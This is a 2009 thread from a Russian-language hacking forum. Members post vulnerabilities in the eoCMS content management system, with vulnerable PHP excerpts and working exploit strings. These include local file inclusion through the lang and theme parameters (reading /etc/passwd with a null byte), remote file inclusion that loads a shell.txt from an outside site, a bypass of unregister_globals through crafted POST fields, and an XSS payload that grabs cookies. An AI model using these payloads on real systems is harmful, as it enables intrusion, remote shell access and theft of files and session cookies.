ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Уязвимости eoCMS
  #1  
Старый 13.10.2009, 20:25
Аватар для HAXTA4OK
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию Уязвимости eoCMS

Офф сайт: _http://eocms.com/

LFI


В файле Index.php
PHP код:
if(defined('COOKIE_LANG'))
    
$lang_path COOKIE_LANG;
if(isset(
$settings['site_lang']))
    
$lang_path $settings['site_lang'];
if(isset(
$user['lang']))
    
$lang_path $user['lang'];
if(isset(
$_GET['lang']))
    
$lang_path $_GET['lang'];
if(!isset(
$lang_path))
    
$lang_path 'en';
# include actual language files
include_once(IN_PATH.'language/' $lang_path '/' $lang_file);
include_once(
IN_PATH.'language/' $lang_path '/functions.php');
include_once(
IN_PATH.'language/' $lang_path '/panel.php'); 
_http://eocms.com/index.php?lang='
ЗЫ да со скулями поторопился

Последний раз редактировалось HAXTA4OK; 14.10.2009 в 20:01..
 
Ответить с цитированием

  #2  
Старый 14.10.2009, 19:48
Аватар для gisTy
gisTy
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857

Репутация: 504


По умолчанию

Цитата:
Сообщение от HAXTA4OK  
...
слушай, а ты пробовал использовать те дыры что нашел? и в какой версии eoCMS ты их нашел? так как сообщение было написано вчера, то я думаю, что это была версия v0.9.01. а если я прав то как бы вот кусок кода из framewok.php (он инклудится в самом начале index.php)
PHP код:
  /************************
   ** Clean superglobals **
   ************************/
function Sanitize($data_to_sanitize) {
    if (
get_magic_quotes_gpc())
        
$data_to_sanitize stripslashes($data_to_sanitize); 
    
$data_to_sanitize htmlspecialchars($data_to_sanitizeENT_QUOTES);
    
$data_to_sanitize addslashes($data_to_sanitize);
    return 
$data_to_sanitize;
}
function 
Sanitize_Array($value) {
    
$value is_array($value) ? array_map('Sanitize_Array'$value) : Sanitize($value);
    return 
$value;
}
$_POST array_map('Sanitize_Array'$_POST);
$_GET array_map('Sanitize_Array'$_GET);
$_COOKIE array_map('Sanitize_Array'$_COOKIE);
$_REQUEST array_map('Sanitize_Array'$_REQUEST);
$_SERVER array_map('Sanitize_Array'$_SERVER);
$_FILES array_map('Sanitize_Array'$_FILES); 

Последний раз редактировалось gisTy; 14.10.2009 в 19:56..
 
Ответить с цитированием

  #3  
Старый 14.10.2009, 20:18
Аватар для HAXTA4OK
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

Цитата:
Сообщение от gisTy  
где именно? там максимум чего можно добиться через то, что ты выложил- это Full Path Disclosure (раскрытие путей)
ну извени если там null- byte не канает и для тебя ошибка

Warning: include_once() [function.include]: Failed opening '/home/garbages/public_html/eocms.com/language/jhgj\0//Pages.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/garbages/public_html/eocms.com/index.php on line 118

это тока раскрытие путей тогда я не знаю.....

PS то что выкладывал скули , они есть но вот реализовать их либо тяжело .либо ни как, пока не пытался

Последний раз редактировалось HAXTA4OK; 14.10.2009 в 20:32..
 
Ответить с цитированием

  #4  
Старый 16.10.2009, 01:47
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Remote File Inclusion
Требования: register_globals = on
Файл: js/bbcodepress/bbcode-form.php

PHP код:
include_once($BBCODE_path 'bbcodepress/bbcodepress-lite.php'); 
www.example.com/js/bbcodepress/bbcode-form.php?BBCODE_path=http://www.site.com/shell.txt?
 
Ответить с цитированием

  #5  
Старый 16.10.2009, 03:42
Аватар для (Dm)
(Dm)
Reservists Of Antichat - Level 6
Регистрация: 08.04.2008
Сообщений: 286
Провел на форуме:
2375131

Репутация: 1695
По умолчанию

Вот ещё чуть:
---------------------------------------
Бага: обход unregister_globals и раскрытие пути
Условия: register_globals = ON

>> framework.php

PHP код:
function unregister_globals(){

#checks if register globals is on

    
if (!ini_get('register_globals')){

        return 
false;

    }

    foreach (
func_get_args() as $name){

        foreach (
$GLOBALS[$name] as $key=>$value){
            if (isset(
$GLOBALS[$key])) {

                unset(
$GLOBALS[$key]);

            }        
        }

    }

}
unregister_globals('_POST''_GET''_COOKIE''_REQUEST''_SERVER''_ENV''_FILES''_SESSION'); 
В результате все перменные посланные данными методами удаляются из GLOBALS;
Но если сделать запрос:

Код:
POST /index.php?antichat=test HTTP/1.1
Host: eocms
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

_GET=this del&_REQUEST=this del
Функция unregister_globals сначало удалит, масив _GET, потом _REQUEST, а переменная antichat будет жить)


-------------------------------
Бага: LFI
Условия: magic_quites = Off

>> framework.php

PHP код:
if(isset($_GET['theme']) && file_exists('themes/'.$_GET['theme'].'/theme-info.php'))

    
$settings['site_theme'] = $_GET['theme'];

~~~~~~~~~~~~~~~~~~~~

function 
theme() {

   global 
$user$settings;

   
$arg func_get_args();

   
$num func_num_args();

   if(
file_exists('themes/' $settings['site_theme'] . '/functions/'.$arg[0].'.php'))

       include_once 
IN_PATH.'themes/' $settings['site_theme'] . '/functions/'.$arg[0].'.php'
Этот код выполняется до того как переменные обрабатываются через addslashes

exploit:
http://eocms/index.php?theme=../../../../../../../etc/passwd%00

------------------------------

Бага: XSS
Условия: register_globals = ON

exploit:
Код:
POST /index.php?error_die[0]=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1
Host: eocms
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

_GET=this del&_REQUEST=this del

Последний раз редактировалось (Dm); 16.10.2009 в 03:45..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей vBulletin] bandera Форумы 74 07.06.2010 16:19
Переполнение буфера в Kaspersky Anti-Virus bul666 Мировые новости 9 15.08.2009 15:08
Перевод описания плагинов w3af Kuzya Статьи 4 07.06.2009 09:13
63% web-сайтов содержат опасные уязвимости Suicide Мировые новости 4 24.05.2009 21:51



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ